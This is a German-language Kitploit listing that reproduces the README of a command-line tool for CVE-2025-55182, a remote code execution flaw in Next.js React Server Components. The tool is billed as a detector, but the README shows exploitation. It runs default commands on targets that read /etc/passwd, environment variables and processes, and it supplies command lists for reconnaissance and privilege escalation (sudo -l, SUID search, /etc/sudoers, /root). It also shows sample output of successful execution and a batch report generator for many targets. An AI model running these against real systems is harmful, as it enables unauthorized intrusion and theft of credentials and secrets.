Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Components. | Kitploit
Tools/GitHubGitHub/rix4uni/cve-2025-55182
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and Control
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Components.

Repository anzeigen
61vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182

Ein Kommandozeilen-Tool zur Erkennung von CVE-2025-55182 und CVE-2025-66478 in Next.js-Anwendungen, die React Server Components verwenden.

🚀 Installation

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ Verwendung

CVE-2025-55182 Scanner

Grundlegende Syntax

root@kitploit:~
CVE-2025-55182 -d https://example.com

Optionen

Hinweis: Wenn keine Befehlsoptionen angegeben werden, werden die Standardbefehle ausgeführt.

Standardbefehle

Das Tool führt standardmäßig diese Befehle aus:

  1. cat /etc/os-release – Betriebssysteminformationen
  2. whoami – Aktueller Benutzer
  3. pwd – Aktuelles Arbeitsverzeichnis
  4. id – Benutzer-ID und Gruppen
  5. uname -a – Systeminformationen
  6. hostname -I – Netzwerkschnittstellen
  7. ls -la – Verzeichnisliste
  8. cat /etc/passwd – Benutzerkonten
  9. env – Umgebungsvariablen
  10. ps aux – Laufende Prozesse

Berichtsgenerator

Das reportgenerator-Tool erstellt automatisch professionelle Schwachstellen-Offenlegungsberichte aus Scan-Ergebnissen.

Funktionen

  • Parallel-Scanning mehrerer Ziele
  • Automatische Nummerierung, die vorhandene Berichte beibehält (keine Überschreibungen)
  • Professionelle Markdown-Berichte mit Abschnitt zur Sicherheitslücken-Offenlegung
  • Anpassbarer Forschername und Eingabedatei

Grundlegende Verwendung

root@kitploit:~
# Erstellen Sie eine Datei mit den Zieldomains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# Berichtsgenerator ausführen
reportgenerator

Optionen

FlagBeschreibungStandard
--fileEingabedatei mit Zieldomainssubs.txt
--userName des Forschers für den OffenlegungsabschnittBhagirath Saxena

Beispiele

root@kitploit:~
# Standardeinstellungen verwenden (subs.txt, Bhagirath Saxena)
reportgenerator

# Benutzerdefinierte Zieldatei verwenden
reportgenerator --file targets.txt

# Benutzerdefinierten Forschernamen verwenden
reportgenerator --user "John Doe"

# Beide benutzerdefinierten Optionen verwenden
reportgenerator --file my-targets.txt --user "Jane Smith"

Ausgabestruktur

Die Berichte werden in zwei Verzeichnissen generiert:

  • textfile/ – Roh-Scan-Ausgabe (nummeriert: 1.txt, 2.txt, usw.)
  • mdfile/ – Professionelle Markdown-Berichte (nummeriert: 1.md, 2.md, usw.)

Hinweis: Die automatische Nummerierungsfunktion stellt sicher, dass vorhandene Berichte niemals überschrieben werden. Neue Scans setzen bei der höchsten vorhandenen Nummer fort.

Berichtsformat

Jeder generierte Bericht enthält:

  1. Sicherheitslücken-Offenlegung – Professionelles Einführungsschreiben
  2. Ziel – Die getestete Domain
  3. Ausgeführte Befehle – Liste der während des Tests ausgeführten Befehle
  4. Schwachstellenzusammenfassung – CVE-Details und Auswirkungsbewertung
  5. Ausnutzungsdetails – Befehlsausgaben mit Ausführungsstatus
  6. Ausführungszusammenfassung – Tabelle mit Erfolg/Misserfolg jedes Befehls
  7. Auswirkungsanalyse – Schweregradbewertung und Beobachtungen
  8. Empfehlungen – Abhilfemaßnahmen für das Sicherheitsteam
  9. Referenzen – Links zu CVE-Details und Sicherheitshinweisen

🎨 Ausgabebeispiele

Erfolgreiche Ausnutzung

root@kitploit:~
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...

[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...

Teilweiser Erfolg

root@kitploit:~
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝

[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 Technische Details

Schwachstelle

  • CVE: CVE-2025-55182
  • Typ: Prototype Pollution → RCE
  • Betroffen: Next.js-Anwendungen mit bestimmten Konfigurationen
  • Vektor: HTTP POST mit manipuliertem multipart/form-data
  • Auswirkung: Nicht authentifizierte Remote-Codeausführung als Anwendungsbenutzer

📚 Referenzen

  • Details zu CVE-2025-55182
  • Next.js Sicherheitshinweise

Verzeichnis commands/ – Beispiele:

Erstellen Sie Beispieldateien mit Befehlen für verschiedene Szenarien:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
Tool herunterladen
OptionBeschreibungStandard
-d, --domainZiel-URL (fügt automatisch https:// hinzu, falls kein Protokoll angegeben)http://localhost:3000
-c, --commandEinzelner Befehl zur Ausführung-
-m, --multipleMehrere Befehle, getrennt durch Semikolons-
-f, --fileDatei mit Befehlen (ein Befehl pro Zeile)-
-h, --helpHilfemeldung anzeigen-